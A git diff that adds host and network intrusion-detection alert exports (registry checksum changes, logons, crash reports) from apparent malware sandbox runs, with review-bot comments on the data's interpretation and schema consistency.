+" +"Apr 4, 2020 @ 17:09:34.076",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:34.591",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:34.608",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:34.873",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:34.889",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:09:34.967",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:09:34.983",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2aaa9' was added. +" +"Apr 4, 2020 @ 17:10:00.967",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:10:00.984",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2aaa9\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 17:10:01.002",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2aaa9' was added. +" +"Apr 4, 2020 @ 17:10:06.857",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2aaa9\Security' was added. +" +"Apr 4, 2020 @ 17:10:06.873",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2aaa9' was added. 
+"
+"Apr 4, 2020 @ 17:10:08.826",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2aaa9\Security' was added.
+"
+"Apr 4, 2020 @ 17:10:08.843",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2aaa9' was added.
+"
+"Apr 4, 2020 @ 17:10:09.327",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2aaa9\Security' was added.
+"
+"Apr 4, 2020 @ 17:10:09.343",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2aaa9' was added.
+"
+"Apr 4, 2020 @ 17:06:18.162",4,"Summary event of the report's signatures",
+"Apr 4, 2020 @ 17:04:27.685",3,"Windows Logon Success",
+"Apr 4, 2020 @ 17:04:37.241",3,"Software Protection service scheduled successfully",
+"Apr 4, 2020 @ 17:06:17.740",3,"Windows Logon Success",
+"Apr 4, 2020 @ 17:07:47.674",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'."
+"Apr 4, 2020 @ 17:07:49.692",3,"Windows Logon Success",
+"Apr 4, 2020 @ 17:07:52.516",3,"The database engine is starting a new instance",
+"Apr 4, 2020 @ 17:07:52.593",3,"The database engine attached a database",
+"Apr 4, 2020 @ 17:07:52.763",3,"The Windows Search Service started",
+"Apr 4, 2020 @ 17:07:53.152",3,"Windows Logon Success",
+"Apr 4, 2020 @ 17:08:07.749",3,"Windows Logon Success",
+"Apr 4, 2020 @ 17:08:08.715",3,"Windows Workstation Logon Success",
+"Apr 4, 2020 @ 17:08:08.731",3,"Windows Workstation Logon Success",
+"Apr 4, 2020 @ 17:08:08.762",3,"Windows User Logoff",
+"Apr 4, 2020 @ 17:08:08.778",3,"Windows User Logoff",
+"Apr 4, 2020 @ 17:08:29.810",3,"Software Protection service scheduled successfully",
+"Apr 4, 2020 @ 17:09:08.919",3,"Windows Logon Success",
+"Apr 4, 2020 @ 17:09:46.492",3,"Software Protection service scheduled successfully",
+"Apr 4, 2020 @ 17:09:47.296",3,"Windows Logon Success",
+"Apr 4, 2020 @ 17:09:49.218",3,"Windows Logon Success",
diff --git a/data/MW_17_HIDS_2.csv b/data/MW_17_HIDS_2.csv
new file mode 100644
index 0000000..6332bf5
--- /dev/null
+++ b/data/MW_17_HIDS_2.csv
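Review bot: The two `HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer` alerts at 17:07:04 and 17:08:51 record `d41d8cd98f00b204e9800998ecf8427e` / `da39a3ee5e6b4b0d3255bfef95601890afd80709` as the intermediate digests, which are the MD5 and SHA-1 of empty input — the key was read back as empty for roughly 100 seconds and then restored to its previous digest, and that is the one FIM finding in this file that deserves a line in the sample write-up rather than being buried among the level-7 churn from `bam`, `*\Parameters\Wdf` and `W32Time`. `Ossec agent started` at 17:07:47 sits between alerts stamped 17:02 and 17:09, so the agent restarted mid-run and any activity in the gap is unobserved; the notes should say whether that restart was deliberate. Rows are grouped by `rule.level` rather than by time, and this export lacks the `data.win.system.message` column carried by the other two HIDS files, so the three cannot be parsed with one schema; consider re-exporting with the same column set and a chronological sort.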
@@ -0,0 +1,210 @@
+timestamp,"rule.level","rule.description","full_log","data.win.system.message"
+"Apr 26, 2020 @ 09:58:44.824",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event."""
+"Apr 26, 2020 @ 09:58:44.810",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event."""
+"Apr 26, 2020 @ 09:58:21.607",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed.
+Old md5sum was: '302567d0e9b6bb461f19aa9d78f76a6c'
+New md5sum is : '895df8cc5739efcdc5c8fe13b2771ee6'
+Old sha1sum was: 'b504dec9dc3bf11d19b065debc90d46aa7acd1b6'
+New sha1sum is : '7ad0adbefe76be7d2f1708306b6e924bff43921d'
+",
+"Apr 26, 2020 @ 09:58:21.592",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed.
+Old md5sum was: '90d8a3098aa7762a2499aa27705ed40c'
+New md5sum is : '053e1e0333f95face38eae3da5f4dae5'
+Old sha1sum was: 'c41442ce5f1fe0f2db713a0f2894dc530f721504'
+New sha1sum is : '59809a07a561b359699e84280b2de1c11eb7ed92'
+",
+"Apr 26, 2020 @ 09:58:15.008",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed.
+Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef'
+New md5sum is : '682d23e380b3858be2cde141ecd915b6'
+Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f'
+New sha1sum is : 'c127e2d2a6906e2591f30ce51505eb1db95ea99a'
+",
+"Apr 26, 2020 @ 09:58:10.073",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SmsRouter\State\Registration\Map' checksum changed.
+Old md5sum was: 'f725bdba3c624ef1211452f438569838' +New md5sum is : 'a3c20e4136219d3eef2191a27f3f2145' +Old sha1sum was: '76d6ea0f40d643341bc4517a2d1b043f15ea0c6b' +New sha1sum is : 'f4f8158f74f78ded6fde0eebbb72a617e2aa9fb8' +", +"Apr 26, 2020 @ 09:58:10.058",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SmsRouter\State\Registration\Ids\{11C6734A-8F7B-4A5E-B26E-BDB14A32613D}' was added. +", +"Apr 26, 2020 @ 09:58:08.459",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '06f3d2f39343f57d32dd262e225aae84' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : 'cc04983290ed793a09187d5412932856395b581c' +", +"Apr 26, 2020 @ 09:57:35.920",4,"Summary event of the report's signatures",,"""Fault bucket 2248426720713588459, type 1 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: program17.exe +P2: 0.0.0.0 +P3: 5e5b84f7 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 832e7bce +P7: c0000005 +P8: 00063cb3 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB154.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB349.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3D6.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB413.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERB452.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_program17.exe_b8355ffce62437e56ebb4421561b73589124a3_d2bf1580_b8884a20-bc96-434c-9c37-f795e52477c3 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 0eac7a5f-b2f5-403f-ae2b-0162b07c63f7 +Report Status: 268435456 +Hashed bucket: 63bbee492b7abb4bef34043097a13eeb +Cab Guid: 0""" +"Apr 26, 2020 @ 09:57:30.964",3,"Windows Logon Success",,"""An account was successfully 
logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 09:57:30.442",9,"Windows Application error event",,"""Faulting application name: program17.exe, version: 0.0.0.0, time stamp: 0x5e5b84f7 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x832e7bce +Exception code: 0xc0000005 +Fault offset: 0x00063cb3 +Faulting process id: 0x1674 +Faulting application start time: 0x01d60cd73f44bf48 +Faulting application path: C:\Users\John Williams\Downloads\program17.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 0eac7a5f-b2f5-403f-ae2b-0162b07c63f7 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 09:57:15.175",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'e415cd732af76fc8e2f6f97c4e6c5f3c' +New md5sum is : '3d31da889e8deb44149f83121f6c6101' +Old sha1sum was: '8450855442dc0dae778f9ab1823823bbe8029aae' +New sha1sum is : '5515d7c6eec4936ffb6265e9458e59e3d94f97ed' +", +"Apr 26, 2020 @ 09:57:15.138",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '4ba4365f07f1541a9d0cb4adc696cbaa' +New md5sum is : 'cf52cdc0b943279a6903187dd77773f1' +Old sha1sum was: '6766757ccbe9ec12bc588faf319b992e7bd63e19' +New sha1sum is : 'bbef7fb8ffca88784a4809d3734c5f102eb31c3d' +", +"Apr 26, 2020 @ 09:57:15.094",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 26, 2020 @ 09:57:05.249",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."""
diff --git a/data/MW_17_HIDS_3.csv b/data/MW_17_HIDS_3.csv
new file mode 100644
index 0000000..d49ef06
--- /dev/null
+++ b/data/MW_17_HIDS_3.csv
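Review bot: `program17.exe`, launched from `C:\Users\John Williams\Downloads\`, crashed at 09:57:30 with exception `0xc0000005` in `ntdll.dll` (the level-9 application error, confirmed by the APPCRASH summary at 09:57:35), so the sample most likely never reached its payload and the thin alert set for this run should be labelled inconclusive rather than read as evasion or as a benign run. The `Service startup type was changed` row at 09:57:05 — BITS moved from demand start to auto start, 25 seconds before the crash — is the only row here that could plausibly be sample-induced, since BITS is a well-known download and persistence vehicle, but the event carries no subject account or process, so it needs correlating with a process-creation record before being attributed. The WER artifacts under `C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_program17.exe_…` include a `.dmp`; preserving them next to this CSV would let someone triage why the sample faulted. The remaining rows (SYSTEM logon type 5 from `services.exe`, `W32Time`/`Tcpip`/`SmsRouter` checksum churn) are OS background and could be annotated as such.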
@@ -0,0 +1,53 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 18:44:02.398",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '1c729912f87f9abbd1574176fc5996f7' +New md5sum is : '370914f65a755a1cbfcf0c873b11feaa' +Old sha1sum was: '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +New sha1sum is : 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +", +"May 22, 2020 @ 18:39:10.056",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : 'b8bd9a8efec7a359e742214d63c08159' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : 'ff937e547663041181c255a80aca46726df29b79' +", +"May 22, 2020 @ 18:39:10.040",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : 'dc8f80cda5e0fded41dd72670a09668a' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '64b2c741db7749f5d3f22c09bdb6517eb666e2fc' +", +"May 22, 2020 @ 18:37:39.545",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 22, 2020 @ 18:37:31.822",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 22, 2020 @ 18:32:46.102",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. 
+Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"May 22, 2020 @ 18:31:27.079",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 18:31:27.067",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, diff --git a/data/MW_17_NIDS.csv b/data/MW_17_NIDS.csv new file mode 100644 index 0000000..03c3de0 --- /dev/null +++ b/data/MW_17_NIDS.csv @@ -0,0 +1 @@ +"@timestamp",message,"log.file.path" diff --git a/data/MW_18_HIDS_2.csv b/data/MW_18_HIDS_2.csv new file mode 100644 index 0000000..97cb1f0 --- /dev/null +++ b/data/MW_18_HIDS_2.csv 
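Review bot: The header of `data/MW_17_HIDS_3.csv` orders its columns `timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine"`, while the `data/MW_18_HIDS_2.csv` header in the following section uses `timestamp,"rule.level","rule.description","full_log","data.win.system.message"` with no commandLine column, so a consumer reading these exports by position would swap the `full_log` text and the Windows event message between files. Either normalise the column order across all HIDS exports or state in the dataset README that rows must be read by header name. A short README note would also help explain that `rule.level` is the alert severity of the host agent (these look like Wazuh alert fields — confirm) and that the old/new md5 and sha1 pairs in the `full_log` rows are the agent's checksums of the named registry key before and after the change, since neither is obvious from the header alone.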
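Review bot: `data/MW_17_NIDS.csv` is added with only its header row (`"@timestamp",message,"log.file.path"`) and no data lines, which leaves it ambiguous whether sample 17 produced no network alerts at all or the export was empty or truncated. A README sentence on how header-only exports are to be interpreted, or a documented convention of omitting such files, would remove that ambiguity for anyone deriving per-sample detection results from these CSVs.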
@@ -0,0 +1,3551 @@ +timestamp,"rule.level","rule.description","full_log","data.win.system.message" +"Apr 26, 2020 @ 10:19:57.520",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. 
+ - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:19:46.827",4,"Summary event of the report's signatures",,"""Fault bucket 2185101440673817794, type 5 +Event Name: MoAppCrash +Response: Not available +Cab Id: 0 + +Problem signature: +P1: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +P2: praid:App +P3: 3.38.2002.25003 +P4: 5e5603d7 +P5: StackHash_1e37 +P6: 0.0.0.0 +P7: 00000000 +P8: c0000005 +P9: PCH_3F_FROM_unknown+0x0000000000000000 +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4A.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERED2.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF02.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF38.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER1004.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.XboxGa_ff945b650ea7a758f50f2795fa89c89c57daf68_f472b3e4_6be068d3-551f-491d-ab67-2601b91313dc + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 6043e941-db82-484a-9842-0178d3634dfa +Report Status: 268435456 +Hashed bucket: e8f8e606c7fc5e89ae530a2ee18ea4c2 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:19:44.827",9,"Windows Application error event",,"""Faulting application name: GameBarFTServer.exe, version: 3.38.2002.25003, time stamp: 0x5e5603d7 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff7a3a6e38d +Faulting process id: 0x1b78 +Faulting application start time: 0x01d61bb3b3fc2e62 +Faulting application path: C:\Program 
Files\WindowsApps\Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe +Faulting module path: unknown +Report Id: 6043e941-db82-484a-9842-0178d3634dfa +Faulting package full name: Microsoft.XboxGamingOverlay_3.38.25003.0_x64__8wekyb3d8bbwe +Faulting package-relative application ID: App""" +"Apr 26, 2020 @ 10:19:44.514",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 26, 2020 @ 10:19:41.009",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, +"Apr 26, 2020 @ 10:19:24.443",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '754f1ee7e3cc78fe16476bedca194ad8' +New md5sum is : '90f14b46cd527a392c45fe92123fbceb' +Old sha1sum was: '71353faa3213206f750e881a2b1d4519bdb7044b' +New sha1sum is : '7e56dd2b19f06e5dd4400eb7a4c82f31a698242a' +", +"Apr 26, 2020 @ 10:19:24.413",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '754f1ee7e3cc78fe16476bedca194ad8' +New md5sum is : '90f14b46cd527a392c45fe92123fbceb' +Old sha1sum was: '71353faa3213206f750e881a2b1d4519bdb7044b' +New sha1sum is : '7e56dd2b19f06e5dd4400eb7a4c82f31a698242a' +", +"Apr 26, 2020 @ 10:19:23.186",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '47f9a8fc035cc80b23dfd8be4d23cda6' +New md5sum is : '9dfd54b19f9e55c21128125e5102e751' +Old sha1sum was: '592c18db00c7cbd34e9537e069e1bf1ae084bc9d' +New sha1sum is : 'e84833ac704745c78990ccc10f00b25e13c74b66' +", +"Apr 26, 2020 @ 10:19:23.167",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '480a7b1436febced63b663e198db057e' +New md5sum is : '9fbda96814af24f5f3d16c138948e1e3' +Old sha1sum was: 'a366c53c7d877bd13ac0386830dbad1b52127af9' +New sha1sum is : '133b476e62d3fa15ca9d6d91c2368e3b889b0812' +", +"Apr 26, 2020 @ 10:19:22.674",5,"Clipboard User Service_3ddcb terminated unexpectedly",,"""The Clipboard User Service_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 3000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:19:22.652",4,"Summary event of the report's signatures",,"""Fault bucket 1421593295057521696, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: svchost.exe +P2: 10.0.18362.1 +P3: 32d6c210 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA6A.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC4F.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC8F.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERACC2.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD60.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_a4555823d184431378d589e9aa5705236516327_a3c514cf_569ea5ed-6116-45d7-8e33-0b94de46dce0 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 568bb1aa-d5a0-4259-8363-f0fadab010af +Report Status: 268435456 
+Hashed bucket: 1b46097b621a046973ba8391e6fb0c20 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:19:20.129",9,"Windows Application error event",,"""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xdac +Faulting application start time: 0x01d61bb3a709dcea +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 568bb1aa-d5a0-4259-8363-f0fadab010af +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:19:16.687",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3ddcb' was added. +", +"Apr 26, 2020 @ 10:19:16.672",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:19:08.481",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : 'a3760583847a63e992a3a72934c1b306' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '14db976f0662a2dd50e42d2b09269e605b31bca7' +", +"Apr 26, 2020 @ 10:19:08.440",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '06ee04d9da091e86d711d66806729f5c' +New md5sum is : '69659bb51824551ef0e2f2191f239a24' +Old 